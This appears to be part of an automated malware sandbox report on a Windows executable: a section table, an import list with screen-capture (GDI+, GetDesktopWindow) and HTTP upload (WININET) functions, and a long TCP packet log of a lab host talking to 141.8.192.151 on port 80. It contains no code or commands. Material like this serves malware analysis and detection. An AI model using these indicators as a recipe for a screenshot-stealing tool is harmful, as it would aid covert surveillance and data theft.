.rdata	0x87000	0x1a596	0x1a600	False	0.4773863299763033	data	5.592124453306788	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa2000	0x42d4	0x1a00	False	0.1736778846153846	DOS executable (block device driver \200\377\377\377\377\261,32-bit sector-support)	3.945907427530122	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xa7000	0x680c	0x6a00	False	0.6731647995283019	data	6.626873203758056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	EnterCriticalSection, GetCurrentProcess, WriteFile, LeaveCriticalSection, SetFilePointer, InitializeCriticalSectionEx, UnmapViewOfFile, GetModuleHandleA, HeapSize, MultiByteToWideChar, GetFileInformationByHandle, CopyFileA, GetLastError, CreateFileA, FileTimeToSystemTime, LoadLibraryA, LockResource, HeapReAlloc, CloseHandle, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, GetLocalTime, DecodePointer, HeapDestroy, GetProcAddress, CreateFileMappingA, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, HeapFree, MapViewOfFile, GetTickCount, IsWow64Process, AreFileApisANSI, GetFullPathNameW, LockFile, InitializeCriticalSection, GetFullPathNameA, SetEndOfFile, GetTempPathW, CreateFileW, GetFileAttributesW, GetCurrentThreadId, Sleep, GetTempPathA, GetFileAttributesA, GetVersionExA, DeleteFileA, DeleteFileW, LoadLibraryW, UnlockFile, LockFileEx, GetCurrentProcessId, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, QueryPerformanceCounter, FlushFileBuffers, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, SizeofResource, GetModuleFileNameA, WideCharToMultiByte, ReadFile, ReadConsoleW, GetTimeZoneInformation, GetFileType, GetFileSizeEx, GetConsoleMode, GetConsoleCP, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetTimeFormatW, GetDateFormatW, WriteConsoleW, GetCommandLineW, GetCommandLineA, GetStdHandle, GetModuleFileNameW, QueryPerformanceFrequency, GetModuleHandleExW, ExitProcess, VirtualQuery, VirtualProtect, VirtualAlloc, GetSystemInfo, GetCurrentDirectoryW, CreateDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesExW, RemoveDirectoryW, SetFilePointerEx, SetLastError, GetModuleHandleW, CopyFileW, LocalFree, GetStringTypeW, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, InitializeSListHead, TerminateProcess, RtlUnwind, LoadLibraryExW
USER32.dll	GetDC, GetSystemMetrics, ReleaseDC, GetDesktopWindow
GDI32.dll	DeleteObject, GetObjectA
SHLWAPI.dll	PathFindExtensionW, PathFindExtensionA
gdiplus.dll	GdipSaveImageToFile, GdipCreateBitmapFromScan0, GdipGetImageEncodersSize, GdipDisposeImage, GdipGetImageEncoders, GdiplusShutdown, GdipCreateBitmapFromHBITMAP, GdiplusStartup
WININET.dll	InternetWriteFile, HttpEndRequestA, HttpSendRequestExA, InternetOpenA, HttpOpenRequestA, InternetConnectA, InternetCloseHandle

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 4, 2023 11:12:02.299077034 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.388925076 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.389061928 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.390363932 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.390427113 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.392108917 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.480371952 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.480448961 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.480583906 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.481584072 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.481717110 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.570429087 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.570636034 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.571188927 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.571228981 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.571310997 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.571310997 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.660388947 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.660446882 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.660756111 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.660753012 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.660852909 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.661007881 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.661056042 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.661106110 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.661178112 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.750740051 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.750844955 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.750906944 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.750945091 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.750981092 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.751014948 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.751224041 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.751298904 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.751321077 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.752255917 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.840977907 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841063976 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841176987 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841238022 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.841316938 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.841408968 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841520071 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.841569901 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841584921 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841703892 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.841722012 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.841823101 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.841875076 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.842010021 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.842106104 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.842197895 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.842225075 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.842308998 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.930998087 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931054115 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931132078 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931165934 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931200981 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931302071 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931338072 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931421041 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931421995 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931440115 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931477070 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931477070 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931514025 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931530952 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931549072 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931581020 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931581020 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931616068 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931648016 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931653023 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931688070 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931736946 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931808949 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.931885958 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.931993008 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.932030916 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:02.932075024 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:02.932123899 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021256924 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021336079 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021425009 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021425962 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021476030 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021652937 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021677971 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021764994 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021817923 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021855116 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021889925 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.021905899 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021943092 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.021972895 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022136927 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022269011 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022324085 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022422075 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022448063 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022526026 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022639990 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022676945 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022763014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022763014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022784948 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022871971 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.022893906 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.022994995 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023247004 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023283005 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023319006 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023360014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023407936 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023407936 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023436069 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023554087 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023669004 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023777008 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.023803949 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023983002 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.023999929 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024034977 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024146080 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024244070 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024303913 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024341106 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024439096 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024506092 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024671078 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024687052 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024749041 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024854898 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024905920 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.024965048 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.024969101 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025048971 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025090933 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025136948 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025214911 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025397062 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025507927 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025515079 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025612116 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025702953 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025737047 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025780916 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025839090 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.025842905 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.025933981 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.026046991 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.026134014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.026206970 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.026283026 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.111107111 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111143112 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111218929 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111387014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.111387014 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.111403942 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111630917 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111648083 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111742020 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.111746073 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.111742020 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.113158941 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.126971006 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.127769947 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.127968073 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.128074884 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.128288984 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.128403902 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.128492117 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.200937986 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.200968981 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.201098919 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.201215982 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.201296091 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.211664915 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.211925983 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.217375994 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.217528105 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.217597961 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.217597961 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.217632055 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.217730045 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.217833042 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.217943907 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218005896 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218117952 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218161106 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218266010 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218337059 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218466997 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218543053 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218653917 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218698025 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218719959 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218785048 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218785048 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.218846083 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.218961954 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219052076 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.219147921 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219259977 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.219348907 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.219362974 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219491005 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219549894 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.219669104 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.219670057 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219780922 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.219866037 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.220007896 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.220581055 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.220702887 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.220834017 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.220880032 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.220979929 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.221033096 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.221062899 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.221218109 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.221246958 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.221396923 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.221402884 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.221524954 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.221580982 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.221687078 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.290755033 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.290783882 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.290858030 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.290874958 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.291050911 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.291084051 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.291205883 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.291280985 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.301493883 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.301584959 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.301728010 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.301728010 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.301824093 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.301927090 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307133913 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307209969 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307234049 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307241917 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307276964 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307276964 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307305098 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307440042 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307456017 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307522058 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307523012 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307554960 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307559967 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307619095 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307715893 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307730913 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307790041 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307790041 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.307893991 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.307961941 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308135986 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308157921 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308202982 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308207989 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308227062 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308237076 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308245897 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308397055 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308480978 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308561087 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308624029 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308639050 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308672905 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.308902025 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.308979034 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309067011 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309156895 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309220076 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309284925 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309428930 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309454918 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309477091 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309505939 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309535980 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309535980 CEST	49183	80	192.168.2.22	141.8.192.151
Jul 4, 2023 11:12:03.309609890 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309623003 CEST	80	49183	141.8.192.151	192.168.2.22
Jul 4, 2023 11:12:03.309670925 CEST	49183	80	192.168.2.22	141.8.192.151
